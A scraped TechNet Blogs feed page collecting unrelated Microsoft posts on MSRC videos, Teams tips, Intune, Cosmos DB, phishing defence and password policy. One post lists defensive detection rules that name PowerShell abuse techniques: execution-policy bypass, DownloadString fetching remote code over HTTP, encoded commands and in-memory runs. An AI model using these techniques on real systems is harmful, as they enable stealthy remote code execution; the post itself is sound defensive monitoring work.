Quantcast
Channel: TechNet Blogs
Viewing all 36188 articles
Browse latest View live

Inside MSRC: Sharing Our Story & Customer Tips

$
0
0

For the last 20 years, the Microsoft Security Response Center has been an integral part of Microsoft’s commitment to customer security.  We are often called on to talk about the work we do and how customers can apply the lessons we have learned over that period to better their security posture.  Today we are releasing a series of videos that support that customer-driven story on our YouTube channel: https://www.youtube.com/playlist?list=PLXkmvDo4Mfut_ejSGJkLXDSUsH0uUtBC5.

 

 

This set of short video clips gives customers a glance into the commitment we put into our daily work and suggests ways they can incorporate similar principles into their work.  Security is a joint effort and together we can make a difference.

 

Videos released:

 

The Microsoft Security Response Center video delivers a brief introduction on the current state of cybersecurity, our team’s strategy, and emphasizes the importance of integrating a “better together” approach among cybersecurity organizations and researchers globally to help keep data and the online community safe. Please learn more about our programs and how to engage with us at https://www.microsoft.com/msrc.

 

The Security Conferences video introduces some of security conferences Microsoft speaks at, attends, and produces annually. Highlights include the benefits of bringing the security community together to discuss emerging security trends and how-to best approach emerging security challenges. Please learn more about our programs and how to engage with us at https://www.microsoft.com/msrc.

 

The Bug Bounty video highlights the important role security researchers play in the ecosystem and offers tips on how to increase the success of reporting vulnerabilities, preventing attacks, and receiving recognition and payment. Please learn more about our programs and how to engage with us at https://aka.ms/bugbounty.

 

The Security Vulnerability Engineering video shares some Microsoft cybersecurity best practices, such as investing in “red teams” and “blue teams,” and cybersecurity exercises to help your organization and customers stay ahead of evolving attack tactics. Please learn more about our programs and how to engage with us at https://www.microsoft.com/msrc.

 

The Security Development Lifecycle video explores the importance of addressing the need for more secure code and the Operational Security Assurance program that addresses the need for more secure operations. Please learn more about our programs and how to engage with us at https://aka.ms/sdl.

 

The Defend the Cloud video offers tips that Microsoft’s cyberdefense teams use to increase cybersecurity in our extensive cloud environments, including the importance of investing in your people, platforms, and processes. Please learn more about our programs and how to engage with us at www.microsoft.com/msrc.

 

The Coordinated Vulnerability Disclosure video discusses the importance discovering, reporting, and coordinating security vulnerabilities. It also offers tips on increasing the success of reporting vulnerabilities to and with Microsoft. Please learn more about our programs and how to engage with us at https://www.microsoft.com/msrc.

 

The Industry and Government Security programs video explores the work of the Microsoft Active Protections Program and the Government Security Program. It explains how collaboration between industry partners and governments is critical to protecting customers worldwide. Please learn more about our programs and how to engage with us at https://www.microsoft.com/msrc.

 

Phillip Misner,

Principal Security Group Manager

Microsoft Security Response Center

 

 


Security Monitoring–Additional PowerShell Detections

$
0
0

A colleague of mine turned me on to this particular article on ways to use PowerShell to bypass execution policies. It’s worth noting that PowerShell is a powerful tool that was designed to give a lot of flexibility to IT professionals and developers. That said, this type of a tool can also be leveraged by the bad guys. As such, it makes sense to target certain types of behaviors that are not very common under normal circumstance, but can see elevated usages by threat actors when they are moving through your environments. I’ve added four rules to the next version of Security Monitoring to alert on suspicious behavior. Three are (at least after initial rounds of testing) on by default. The fourth is off and if noise is a problem, will likely need to remain off.  I would also note that I wouldn’t be surprised if more of these ends up being turned off. PowerShell is used on the back end by a number of applications, and as such, I wouldn’t be surprised to see some of this being done as normal behavior or via design in heavily scripted environment. In that case, you may need to turn these off altogether or simply override for particular machines. This can, however, provide a nice defense in depth posture. It will also help the IA folks reviewing these alerts see what is actually going on in production and decide if these practices should be rethought.

First, as goes without saying, you need Process creation auditing turned on as well as the GPO setting to include command line parameters in audit events set. If you’re already following me or using this solution, you’ve probably already done this. For record, I do keep a public version of the GPOs I’m using here. These are simply auditing GPOs applied at the domain level. But it’s worth emphasizing that a lot of the detection that has been built into this tool requires this auditing to be turned on.

Rule 1: PowerShell script run natively to bypass existing execution policy

In this particular rule, we’re looking for PowerShell scripts being run with a specific execution policy switch. This allows scripts to run regardless of execution policy settings.  This can be by design in a user environment, so simply seeing this doesn’t mean that much. That said, I’m tracking 4688 events that are generated by ‘powershell.exe’ with the –ExecutionPolicy switch set to either bypass or unrestricted. This is on at the moment, but I could see it being shut off.

Rule 2: PowerShell used to Invoke a Remote Expression

I would hope that this is not used with much frequency in a typical environment. Effectively, PowerShell can be leveraged to run remote code. Threat actors love this, as they can effectively use their scripts to connect to an http/https share they have online and execute their custom malware. The best part is they can run this in memory only, making it even harder for AV scanners to detect them. Again, we are looking for 4688 events generated by PowerShell. I’m looking for the “Downloadstring” method and an http or https pattern in the command line.  I wouldn’t expect to see this one happen often, so for now, it’s on.

Rule 3: PowerShell used to Invoke an Encoded Command

This is another one that I wouldn’t expect to see run that frequently. Basically, you can convert any text to a base 64 encoded string. This again can be normal, as it gets around formatting issues that can plague script writers or people like me who aren’t PowerShell experts. With that said, however, the bad guys can use this to hide what they are doing from security software, AV, or security analysts. As such, this rule will generate an alert whenever PowerShell is run with the –ENC or –EncodedCommand switches. Like the remote expression rule above, I don’t see this as something that will happen a lot, but it’s possible that this is legitimate.

Rule 4:  PowerShell Running Only in Memory

I had to turn this off in initial testing as our own SQL management pack utilizes this feature. Simply put, the script runs in memory instead of on disk. It’s run using the –NoProfile or –Nop switches. I wouldn’t be surprised if SCOM MPs are generally an offender here, but also a lot of other applications that call PowerShell. As such, I’m not sure of the value of this, but since I took the time to write the rule, I’ll leave it in and leave it disabled. If you choose to enable this, be prepared to set overrides where applicable or enable it only for a select few systems that need to be tightly monitored.

As always, if you want to test this, reach out to me on Linked In.

Update rollup for System Center Updates Publisher now available

$
0
0

We have released an update rollup for System Center Updates Publisher (SCUP). If you have ‘automatically check for available updates at startup’, the update will be offered automatically when you run SCUP. Otherwise you can download it from the Microsoft Download Center here and install it manually.

For more information about this update, including the issues fixed, read KB 4462765 Update rollup for System Center Updates Publisher.

 

 

Connected Arms – Can AI Revolutionize Prosthetic Devices & Make them More Affordable?

$
0
0

Re-posted from the Azure blog channel

In an earlier post, we explored how several top teams at this year’s Imagine Cup had Artificial Intelligence (AI) at the core of their winning solutions. From helping farmers identify and manage crop disease to helping the hearing-impaired, this year’s finalists tackled difficult problems that affect people from all walks of life.

In a new post, we take a closer look at the champion project of Imagine Cup 2018, smartARM.

See how the unexpected combination of a 3D-printed prosthetic arm, a camera embedded in its palm, cloud connectivity and easy access to state-of-the-art AI algorithms allowed let a team of undergraduate students from Canada to accomplish something rather remarkable.

Learn more by clicking the image below or the link that follows.

We are just scratching the surface in terms of the types of medical and healthcare breakthroughs that may result from the application of AI.

As Joseph Sirosh, Corporate Vice President and CTO of AI at Microsoft rightly puts it, "Imagine a future where all assistive devices are infused with AI and designed to work with you. That could have tremendous positive impact on the quality of people’s lives, all over the world.”

You can read the full "Connected Arms" post at this link.

ML Blog Team

Best Practices for Microsoft Teams Descriptions (or, don’t truncate th…

$
0
0

As a Microsoft employee I've been "dogfooding" our new chat-based collaboration hub (Microsoft Teams) for a while now and pretty much enjoying the experience throughout. In the interest of knowledge sharing and wanting to be generally useful, I'd like to raise a usability/discoverability best practice that just materialized for me.

As I was searching for a specific Team to join, I noticed that, in the search results, several teams had issues with their descriptions. Some had no description, others a sub-optimal one, and finally others had a description that looked like it might have been useful, but was cut off prematurely in the Teams UI. Since we at MS have lots and lots of teams, it's vitally important to know what exactly the purpose of the team is - especially a private team (as I wouldn't be able to browse its content until I'm allowed in).

So I humbly propose a quick checklist for creating useful Microsoft Teams descriptions:

  1. Actually populate the description (!)
  2. Put useful info in there. Remember, folks might be browsing through tens or hundreds of teams trying to find relevant chats and content. Don't make them guess!
  3. (And this is the big one) place that useful info at the start of the team description. Like, right at the start. Why? Read on...

You see, in the Teams search UI (at least at the time this post was written), the description gets truncated, and unlike the team name, it doesn't expand in a tooltip when you mouse over the description - rather the text changes to a "Join team" button.

So since it seems we currently only have about 80 characters or so to offer a descriptive preview of our team on the search results UI, we shouldn't waste characters at the start of the description, but instead get right to the point! For example, I see a lot of descriptions starting with  “This is a Microsoft Team for the hosting of content for…” Well, we already know it’s a Team. And by design, it hosts content… So our description isn't providing anything useful so far.

Instead, folks would be much better served with a description that starts right away by providing the most useful, unique info, e.g. “For automotive enthusiasts…”, “Expense support and discussions…” or "Only for members of the xyz project..." We can get into the fluffy details later on in the description if we want, as it won't matter as much if this other stuff gets cut off. Again, while this strategy could prove valuable for all teams, it's especially important for private teams (assuming you can search private teams in your tenant; this might still be in preview/testing). I don't want to waste my or the team owner's time by requesting access to a team that I'm not actually interested in (or shouldn't be a member of)…!

To sum up...

Bad description:

 

 

 

 

 

 

 

 

Good description:

Microsoft 365 ブログまとめ (2018 年 8月)【9/8 更新】

$
0
0

Microsoft 365 は、Office 365、Windows 10、Enterprise Mobility + Security を組み合わせたインテリジェントなソリューションです。 安全に仕事できる環境を作り、働く人すべての力となります。

Office ブログはMicrosoft 365 ブログに進化しました。英語版の Microsoft 365 ブログ (英語)、一部が翻訳された日本語版 Microsoft 365 ブログとともに、元の Office Blogs  もしばらく運用されていきます。製品の更新情報は今後、主に Microsoft 365 ブログに投稿されます。ぜひブックマークして定期的にご参照ください!

 

 

 

≪最近の更新≫

2018/08/31: 8月から Microsoft 365 に加わる新機能 — モダンワークプレースでより多くのことを達成するためのツール (英語)

 

 

Microsoft 365 は、Office 365 のアプリとサービスを含み、Enterprise Mobility + Security および Windows 10 Pro を備えた総合的かつインテリジェントなソリューションです。Microsoft 365 の各製品については、Office 365 | Windows 10 | Enterprise Mobility + Security を参照してください。Office 365 サブスクリプションをお持ちの方を対象とした今月の新機能の詳細については、Windows デスクトップ版 Office の新機能 | Office for Mac の新機能 | Office Mobile for Windows の新機能 | Office for iPhone および Office for iPad の新機能 | Office for Android の新機能を参照してください。月次チャネルと半期チャネルの法人契約の皆様は、対象指定リリース (クライアントサービス) を通じて完全にサポートされたビルドを早期に利用できます。今回ご紹介した機能の入手時期の詳細については、「Office 2016 for Office 365 の最新機能を入手できる時期」を参照してください。

最近は、月末にその月の主な新機能のまとめが出ていますので、簡単に概要を把握するのに便利です。

 

また、英語になりますが、更新に関するビデオドキュメントが出ていますので、こちらもご覧ください。(米国時間毎月8日頃にアップデートされます)

 

過去のまとめを見るには、Office Blogs タグを参照してください。

製品についての最新情報まとめを見るには最新アップデートタグを参照してください。

 

 

Microsoft 365 Business Tech Series Videos – iOS and Android Management

$
0
0

In late June I was approached to record some short technical overview videos on Microsoft 365 Business, and now that they are recorded and published, it’s time to review them, and provide some additional resources and any important updates since the content was created. This is the sixth video in the series, and the focus is on Intune's iOS and Android management capabilities.

With the initial release of Microsoft 365 Business, one of the benefits it provided for iOS and Android were some easy to deploy Mobile Application Management (MAM) policies for iOS and Android. You could configure these directly from the Microsoft 365 Business Admin Center, and they provided a subset of the available apps and MAM policies that Intune supported. The exposed policies and supported mobile apps aligned with some of the goals of Microsoft 365 Business, and they did a good job of simplifying the experience.

MAM policies on iOS and Android are a great way of controlling what can happen with company data within an application, but in most conversations I have about Intune, I generally encourage them to use this approach with Bring Your Own Device (BYOD) type scenarios. This way the organisation controls its data, but the user owns the device. The IT department can't reset or wipe the phone, only the data related to the user's work profile. For an individual bringing their own phone or tablet to work, this is a great solution.

However, if it's a device the company has provided, they may want to control at the device level with MDM and not just MAM. While the full Intune functionality was available in the Azure Portal, that component wasn't licensed for usage. The good news is that with the April 2018 release, the licensing was updated, and full Intune capabilities are now included. While you won't see any changes for iOS and Android policies in the Admin Center at this point in time, if you are comfortable with Intune then it's simply a matter of using Intune in Azure as per usual.

What this now means is that it's really up to you to decide what approach to take. If you think MAM policies are enough for you, start with the native M365B capabilities, and then take a look in Intune to see what is happening under the covers, just in case there are some changes that you want to make. I don't recommend making changes in Intune to the Admin Center policies you create, instead create a policy that duplicates the settings you want, and add the customisations that make sense.

You can check out the other posts in this series below

Microsoft 365 Business Tech Series Videos – Partner Overview

Microsoft 365 Business Tech Series Videos – Assessing Existing Environments

Microsoft 365 Business Tech Series Videos – Cloud Identity

Microsoft 365 Business Tech Series Videos – Hybrid Identity

Microsoft 365 Business Tech Series Videos – Workload Migration

Breaking Into Windows Server 2019: Network Features: Azure Network Adapter

$
0
0

Happy Saturday to our outstanding readers! Brandon Wilson here with a pointer to some more of the new networking features in Windows Server 2019 coming to you straight from the Windows Core Networking team!

In this week's posting, the discussion surrounds something that the importance of will become more and more visible over time, the Azure network adapter. Here is an excerpt straight from the product group:

"Top 10 Networking Features in Windows Server 2019: #3 Azure Network Adapter

https://blogs.technet.microsoft.com/networking/2018/09/05/azurenetworkadapter/

More and more on-premises workloads require connectivity to Azure resources.  Connecting these on-premises workloads to their Azure resources traditionally requires an Express Route, Site-to-Site VPN, or Point-to-Site VPN connection.  Each of these options require multiple steps and expertise in both networking and certificate management, and in some cases, infrastructure setup and maintenance.

Now, Windows Admin Center enables a one-click experience to configure a point-to-site VPN connection between an on-premises Windows Server and an Azure Virtual Network.  This automates the configuration for the Azure Virtual Network gateway as well as the on-premises VPN client. Windows Admin Center and the Azure Network Adapter makes connecting your on-premises servers to Azure a breeze!"

As always, if you have comments or questions on the post, your most direct path for questions will be in the link above.

Thanks for reading, and we'll see you again next week!

Brandon Wilson


Top Contributors Awards! Network Device Enrollment Service (NDES), How to load a partial view and many more!

$
0
0

Welcome back for another analysis of contributions to TechNet Wiki over the last week.

First up, the weekly leader board snapshot...

As always, here are the results of another weekly crawl over the updated articles feed.

 

Ninja Award Most Revisions Award
Who has made the most individual revisions

 

#1 George Chrysovaladis Grammatikos with 101 revisions.

 

#2 HansamaliGamage with 64 revisions.

 

#3 Richard Mueller with 61 revisions.

 

Just behind the winners but also worth a mention are:

 

#4 Peter Geelen with 40 revisions.

 

#5 Bijay Kumar Sahoo with 35 revisions.

 

#6 Arleta Wanat with 32 revisions.

 

#7 Dave Rendón with 24 revisions.

 

#8 Subhro Majumder with 12 revisions.

 

#9 RajeeshMenoth with 10 revisions.

 

#10 Nelson Thomas with 10 revisions.

 

 

Ninja Award Most Articles Updated Award
Who has updated the most articles

 

#1 Richard Mueller with 48 articles.

 

#2 Bijay Kumar Sahoo with 31 articles.

 

#3 Dave Rendón with 13 articles.

 

Just behind the winners but also worth a mention are:

 

#4 Peter Geelen with 13 articles.

 

#5 Carsten Siemens with 9 articles.

 

#6 Arleta Wanat with 9 articles.

 

#7 George Chrysovaladis Grammatikos with 6 articles.

 

#8 RajeeshMenoth with 6 articles.

 

#9 pituach with 2 articles.

 

#10 Nelson Thomas with 2 articles.

 

 

Ninja Award Most Updated Article Award
Largest amount of updated content in a single article

 

The article to have the most change this week was Active Directory Certificate Services (AD CS): Network Device Enrollment Service (NDES), by Kurt L Hudson MSFT

This week's reviser was Stefan Telvian [MSFT]

 

Ninja Award Longest Article Award
Biggest article updated this week

 

This week's largest document to get some attention is BizTalk : Analysis of Direct Mapping vs XDocument Pipeline vs Streaming Pipeline To Process Large Messages for SQL Bulk Insert, by Mandar Dharmadhikari

This week's reviser was Richard Mueller

 

Ninja Award Most Revised Article Award
Article with the most revisions in a week

 

This week's most fiddled with article is ASP.NET Core MVC: How to load a partial view, by HansamaliGamage. It was revised 53 times last week.

This week's revisers were HansamaliGamage & George Chrysovaladis Grammatikos

 

Ninja Award Most Popular Article Award
Collaboration is the name of the game!

 

The article to be updated by the most people this week is TechNet Guru Competitions - September 2018 , by Peter Geelen

This week's revisers were George Chrysovaladis Grammatikos, Kareninstructor, Vincent Maverick Durano, Stoyan Chalakov, pituach, [Kamlesh Kumar] & Subhro Majumder

 

The article to be updated by the second most people this week is Windows 10 Troubleshooting: “Microsoft Store is blocked” Error Code: 0x800704EC, by S.Sengupta

This week's revisers were RajeeshMenoth, Richard Mueller, Peter Geelen, Dave Rendón & S.Sengupta

 

Ninja Award Ninja Edit Award
A ninja needs lightning fast reactions!

 

Below is a list of this week's fastest ninja edits. That's an edit to an article after another person

 

Ninja Award Winner Summary
Let's celebrate our winners!

 

Below are a few statistics on this week's award winners.

Most Revisions Award Winner
The reviser is the winner of this category.

George Chrysovaladis Grammatikos

George Chrysovaladis Grammatikos has won 17 previous Top Contributor Awards. Most recent five shown below:

George Chrysovaladis Grammatikos has not yet had any interviews, featured articles or TechNet Guru medals (see below)

George Chrysovaladis Grammatikos's profile page

Most Articles Award Winner
The reviser is the winner of this category.

Richard Mueller

Richard Mueller has been interviewed on TechNet Wiki!

Richard Mueller has featured articles on TechNet Wiki!

Richard Mueller has won 234 previous Top Contributor Awards. Most recent five shown below:

Richard Mueller has TechNet Guru medals, for the following articles:

Richard Mueller's profile page

Most Updated Article Award Winner
The author is the winner, as it is their article that has had the changes.

Kurt L Hudson MSFT

Kurt L Hudson MSFT has been interviewed on TechNet Wiki!

Kurt L Hudson MSFT has featured articles on TechNet Wiki!

Kurt L Hudson MSFT has won 8 previous Top Contributor Awards. Most recent five shown below:

Kurt L Hudson MSFT has not yet had any TechNet Guru medals (see below)

Kurt L Hudson MSFT's profile page

Longest Article Award Winner
The author is the winner, as it is their article that is so long!

Mandar Dharmadhikari

Mandar Dharmadhikari has been interviewed on TechNet Wiki!

Mandar Dharmadhikari has won 3 previous Top Contributor Awards:

Mandar Dharmadhikari has TechNet Guru medals, for the following articles:

Mandar Dharmadhikari has not yet had any featured articles (see below)

Mandar Dharmadhikari's profile page

Most Revised Article Winner
The author is the winner, as it is their article that has ben changed the most

HansamaliGamage

Hansamali has been interviewed on TechNet Wiki!

Hansamali has won 20 previous Top Contributor Awards. Most recent five shown below:

Hansamali has TechNet Guru medals, for the following articles:

Hansamali has not yet had any featured articles (see below)

Hansamali's profile page

Most Popular Article Winner
The author is the winner, as it is their article that has had the most attention.

Peter Geelen

Peter Geelen has been interviewed on TechNet Wiki!

Peter Geelen has featured articles on TechNet Wiki!

Peter Geelen has won 230 previous Top Contributor Awards. Most recent five shown below:

Peter Geelen has TechNet Guru medals, for the following articles:

Peter Geelen's profile page

 

S.Sengupta

S.Sengupta has won 4 previous Top Contributor Awards:

S.Sengupta has not yet had any interviews, featured articles or TechNet Guru medals (see below)

S.Sengupta's profile page

Ninja Edit Award Winner
The author is the reviser, for it is their hand that is quickest!

Dave Rendón

Dave Rendón has been interviewed on TechNet Wiki!

Dave Rendón has won 57 previous Top Contributor Awards. Most recent five shown below:

Dave Rendón has TechNet Guru medals, for the following articles:

Dave Rendón has not yet had any featured articles (see below)

Dave Rendón's profile page

 

 Says: Another great week from all in our community! Thank you all for so much great literature for us to read this week!

Please keep reading and contributing, because Sharing is caring..!!

 

Best regards,
— Ninja [Kamlesh Kumar]

 

Monitor & protect your data in ALL your clouds, NOW!

$
0
0

Think your organization is operating in a secure and compliant manner? After you answer the following questions, you might want to keep reading...

  • How do you ensure your sensitive data is protected across all the clouds in your environment, whether it's Office 365/G-Suite/Box/SalesForce/etc?
  • Do you have a single pane of glass view of when someone shares a file from one of those clouds to someone outside the organization
  • What about login traffic to those cloud apps?
  • Do you have visibility into your Shadow IT and understand which apps in the environment are storing data overseas or aren't compliant with an industry regulation such as HIPAA or GDPR?

Watch the following 3 minute video for an overview on Cloud App Security in Microsoft 365 - this is the tool that will make you the hero in your organization and help ensure you operate in a secure and compliant manner! Questions? Leave a comment below!

Technical documentation and how to configure what I show in the video for Cloud App Security can be found here.

Why you should enable MFA RIGHT NOW!

ベータ版のご案内 –試験 70-777: Microsoft Azure Cosmos DB Solutions の実装【9/9 更新】

$
0
0

(この記事は 2018 年 8 月 17 日に Microsoft Learning blog に掲載された記事New Beta Exam! 70-777: Implementing Microsoft Azure Cosmos DB Solutions の翻訳です。最新情報についてはリンク元のページをご参照ください。)

Azure Cosmos DB をご利用の開発者やアーキテクトの皆様を対象とした新しい試験が公開されました。この試験は、Cosmos DB API に依存しないスケーラブルなアプリケーションの構築および構成を行うためのパーティション分割、レプリケーション、リソース ガバナンスの基本的な概念に対する理解や、Cosmos DB SQL API の実践的な基礎知識を問うものです。また、ビジネス面や技術面の要件を満たす Cosmos DB ソリューションの設計、構築、トラブルシューティングの実技試験も出題されます。

今回、この試験 70-777 のベータ版に 300 名の方を特別価格でご招待いたします。2018 年 8 月 17 日以降、この試験の受験予約をしていただくと、受験料が 80% 割引になります (ベータ版が有償になった経緯については、こちらのブログ記事 (英語) をご覧ください)。お申込みは先着順で受付いたします。試験の予約と受験は、2018 年 10 月 1 日までに完了してください。できるだけ早く受験していただくことで、皆様のコメントやフィードバック、試験データを活用して、設問の質を評価することができます。受験時期が早ければ早いほど、試験の改善に向けてフィードバックが採用される可能性が高くなります。これは試験の一般公開時に含まれる設問について、皆様のご意見を反映するチャンスです。スコアは試験の一般公開時に再計算され、約 10 日後に最終的なスコアが発表されます。スコアの再計算に関するお知らせについては、@libertymunson の Twitter アカウントをフォローしてご確認ください。ベータ版のスコア計算と試験の一般公開のスケジュールに関しては、「The Path from Beta Exam to Live Exam (英語)」および「More Tips About Beta Exams (英語)」のブログ記事をご覧ください。

 

試験の準備を行うには、試験準備ガイド をご確認のうえ、掲載されているスキルの練習をしてください。他にもヒントが必要な方は、ベータ版の試験の準備に関するブログ記事 (英語) をご参照ください。***80% 割引で受験するには、受験予約の際に、お支払い情報の入力画面でコード 70-777-PANURGIC を入力してください。これはプライベート アクセス コードではありません。このコードは、2018 年 10 月 1 日当日、またはそれより前の受験日のみ有効です。繰り返しになりますが、特別価格で受験していただける人数には限りがあります。また、一部の国 (トルコ、パキスタン、インド、中国、ベトナムなど) ではコードをご利用いただけず、ベータ版の試験を受験できません。加えて、この試験はベータ版のため、スコアがすぐに計算されるわけではありません。最終的なスコアと合否の通知は、試験の一般公開が開始された後にご確認いただけます。

 

 

 

Email Phishing Protection Guide – Part 13: Update Your User Identity Password Strategy

$
0
0

The Email Phishing Protection Guide is a multi-part blog series written to walk you through the setup of many security focused features you may already own in Microsoft Windows, Microsoft Office 365, and Microsoft Azure. By implementing some or all these items, an organization will increase their security posture against phishing email attacks designed to steal user identities. This guide is written for system administrators with skills ranging from beginner to expert.

Introduction: Email Phishing Protection Guide - Enhancing Your Organization's Security Posture

Part 1: Customize the Office 365 Logon Portal

Part 2: Training Users with the Office 365 Attack Simulator

Part 3: Deploy Multi Factor Authentication (MFA)

Part 4: Deploy Windows Hello

Part 5: Define Country and Region Logon Restrictions for Office 365 and Azure Services

Part 6: Deploy Outlook Plug-in to Report Suspicious Emails

Part 7: Deploy ATP Anti-Phishing Policies

Part 8: Deploy ATP Safe Link Policies

Part 9: Deploy ATP Safe Attachment Policies

Part 10: Deploy and Enforce Smart Screen for Microsoft Edge, Microsoft Internet Explorer and Google Chrome

Part 11: Monitor Phishing and SPAM Attacks in Office 365

Part 12: Discover Who is Attacking Your Office 365 User Identities

Part 13: Update Your User Identity Password Strategy

 

Part 13: Update Your User Identity Password Strategy

Earlier in this blog series, I highlighted how often the Office 365 identities in your tenant may be attacked by providing steps to view the information. While I also outlined in Part Three of this series how important and strongly recommended it is to enable Multi Factor Authentication (MFA) for all your users, what if you do not yet have this feature in place? What if your organization has not yet embraced MFA and instead has chosen to continue with a username and password approach? How can this strategy be enhanced to increase security?

For decades, the strategy about password policies has included items such as:

  • Change a password every 30 days
  • Require complexity in passwords
  • Force passwords to be 9,10, or more characters in length

What if I were to tell you that these are no longer recommended based on research done in recent years? Yes, this was a bit of a shock to me when I first started looking into this as well. After all, this is how password policies have been set in my 25+ years of experience in system design and administration. With new threats evolving each day, it is imperative to the security of your organization that you understand why the policies mentioned above (while still better than nothing) are no longer recommended, as well as what is now recommended and why.

Before we get into recent research about passwords, let's look at how people have been using passwords for years. Consider some of your first uses of computer passwords. Perhaps it was for your first CompuServe account, Prodigy account, or perhaps a Blockbuster account. You had a username and password in that former age of dial-up modem Internet connections. Chances are you used something simple to remember. For example, suppose your favorite animal was a lion - so you had a password of lion on these first types of accounts. As time went on, you signed up for more accounts on your favorite travel website, for your local grocery store, your favorite hotel chain, and many more we can all identify with. Chances are, that same password or some variant of it is still being used on modern websites and for your work account. Perhaps it evolved to Lion with a capital L, or Lion5 because you are incrementing numbers, or Lion091879 because that is your birthday, or perhaps Lion091879!# because your employer or your bank website now requires special characters in a password.

Now consider your username at work. It is probably some variant of your first name and last name. Don Smith's username could be Dsmith@domain.com or DonS@domain.com or Don.Smith@domain.com. Something that is common and easily guessed.

As a security professional reading this, you may know better than using a password strategy like the one outlined above. But keep in mind, your users are not nearly as concerned with network security. They are likely doing the minimum required to satisfy password requirements you have had in place for years. And, they are using the same or similar password on your network for every other personal account they have so 50 different passwords do not need to be remembered. We are all human and will try to keep things simple.

Now consider an email phishing attack and then the logon attacks you now see after following the steps in Part 12 of this blog series.

Let's say an email phishing attack was successful and a user entered his/her username and password. The attacker was able to logon to this identity because you did not have MFA enabled (hint: enable MFA). Although you were able to quickly identify the breach and force a password change on the account before any apparent damage was done, the attacker was able to get a few key pieces of information for a new targeted attack:

  • The user who fell victim to the phishing email entered a username using the format used throughout your environment. The attacker now knows this format, providing a key piece of information.
  • The attacker was able to harvest your user directory. He or she now knows the username and email address of everyone in your organization. Perhaps he or she knows the job titles of each person as well if that field is populated in your directory, including individuals who are managers or part of the executive leadership team. Algorithms can now be adjusted for a spear phishing attack against these high value identities with a much higher likelihood of success.

Although the attack and breach was quickly identified and remediated, the attacker can now launch a more targeted attack. Certainly the attacker will continue with an email phishing campaign, but with detailed information now known about your organization the attacker can be much more targeted. Consider the attack scenarios that can now be used:

  • With a directory of your users now in the hands of an attacker, names can be researched on social media sites to find out more about each person. Algorithms can then be adjusted to include passwords that may include (using our example above) your favorite animal with a combination of special characters and capitalization. If you can think of the potential password combinations, the algorithms are designed to try them as well. This type of attack can go on for weeks, months, years, but the probability of a successful password guess grows higher each day.
  • With additional information learned from social media sites about your users, an attacker could determine where each user has other accounts. Although your organization may have fortified its network defenses in various ways, consider this: 'have these social media sites done the same?' An attacker could start logon attempts at these social media sites using the user email addresses discovered in the original attack and again start to guess passwords there with information now known. A successful password guess on one of those sites is now just another clue to a successful password into your organization. If an attacker successfully guessed you are using Lion42 as your password in a social media site, algorithms can then be further fine-tuned to try variants on the identities used at the primary attacker's target.

The list of these scenarios goes on and on. Remember that these attackers are smart, very smart. This is about money to them and this is a business many are running with a lot of great resources and intelligent software developers. A nation-state sponsored attack has even more, almost unlimited, resources. They all have all the time in the world to successfully guess user identity usernames and passwords. With each additional data point(s) known about an organization, the easier it becomes for a successful breach to happen.

A New Password Strategy:

With all of this in mind, what can you do? First, keep in mind that these types of attacks are not just for cloud identities, but for any identity hosted anywhere - on-premises or in any cloud vendor environment. Also consider that cloud environments gather attack intelligence from millions of ongoing attacks and use them to help fortify and adjust the security of the environments. For Microsoft, we see more than 10 million attacks involving passwords each day (reference). This is far more telemetry than any on-premises system can provide and far more than most other vendors can gather. The information is analyzed and mitigations quickly enabled, making a cloud environment the safest infrastructure available for your organization and data. See more information about the Microsoft Intelligent Security Graph here.

Microsoft Research has published a detailed whitepaper describing the volume and types of attacks Microsoft sees and learns from each day. These attacks never stop and are only growing. I recommend you take a few minutes to review the research and recommendations in this whitepaper. Then, I recommend you implement many, if not all of these recommendations in your organization. Remember that you cannot simply enable these recommendations. You will need leadership support, a communication plan to your users about why you are making this change and what they can expect, and then plan how you will test and pilot these new policies.

The first part of this effort is often the most challenging - gaining leadership support. In your presentation to leadership, use the telemetry in the Microsoft Research whitepaper AND collect your own data from Part 12 in this blog series. Make your presentation real with data about attacks your organization has against it every day and remind your audience that a breach is just a user click away from a well-crafted phishing email.

From the Microsoft Research whitepaper on password guidance, below is advice offered for policies to enable in your organization using both Azure Active Directory and Active Directory:

1. Maintain an 8-character minimum length requirement (and longer is not necessarily better)

2. Eliminate character-composition requirements

3. Eliminate mandatory periodic password resets for user accounts

4. Ban common passwords, to keep the most vulnerable passwords out of your system

5. Educate your users not to re-use their password for non-work-related purposes

6. Enforce registration for multi-factor authentication

7. Enable risk based multi-factor authentication challenges

Be sure to review the recommendations above, the data provided in the Microsoft Research Paper, data on attacks against your Office 365 identities each day, steps provided in the Email Phishing Protection Guide, and then develop a new strategy for your organization designed to protect your user identities. Keep in mind that email phishing is one of the newest, most popular and growing types of attacks against your organization today. You must get ahead of this threat, maintain your awareness of new attack vectors, and evolve your security posture accordingly.

An Even Better Strategy - Eliminate Passwords from your Organization

As you evaluate your current password policies and consider a modern strategy, also consider that the best way to protect user identities is to work towards eliminating passwords altogether. This sounds like another strange concept to introduce, but it is something Microsoft has been working on to help provide even more security for user identities. Below are a few blogs with more information about this strategy.

Building a World Without Passwords

Implementing Windows Hello

Microsoft Teams: Blur my background! (Please…)

$
0
0

Have you been on a conference call where everyone turns on their video, except for you? If you're like me, I don't like to turn mine on because of the messy house, or just ugly office behind me. Well - Microsoft Teams has you covered. You can now blur your background when in a conference in Microsoft Teams! You can now use video, and not  worry about what's behind you. Watch the below 90 second video to learn more!

Microsoft Teams: Share my iPhone/iPad screen in a meeting! (While on the beach…)

$
0
0

You're in a conference call while at the airport on your iPhone, and the meeting starts to discuss that important PowerPoint slide or document. You say "I'll have to show you when I get back to my desk". It would be really nice if you could share it from your iPhone while in the meeting. Well - now you can, with Microsoft Teams!

Teams enables you to share the entire screen of your iOS device when in a Microsoft Teams meeting! Watch the below video to learn more! Enjoy!


Every Question Tells a Story – Mitigating Ransomware Using the Rapid Cyberattack Assessment Tool: Part 1

$
0
0

They say that a picture is worth 1,000 words.

But in some cases, the questions that you ask can also help tell a very interesting story.

Let me explain.

All of us are familiar with the devastating effects of ransomware that we saw last year in the WannaCry, Petya, NotPetya, Locky and SamSam ransomware attacks. We read the stories of the massive financial impact these attacks had on their victims, and we can only imagine the stress that the individuals in the IT departments of the impacted organizations went through trying to recover.

You may know that Microsoft has created a tool called the Rapid Cyberattack Assessment. The intent of the tool is to help an organization understand the potential vulnerabilities and exposures they have to ransomware attacks so that they can take steps to keep from being the next victim.

But like I said - every question tells a story - and in this tool there are many questions that an IT admin needs to ask himself or herself, and there’s a story behind each of these questions that helps make the tool’s value evident.

Let's take a look at the tool and as we go through the tool I'll try to give you the story behind each question.

Preparing the Environment

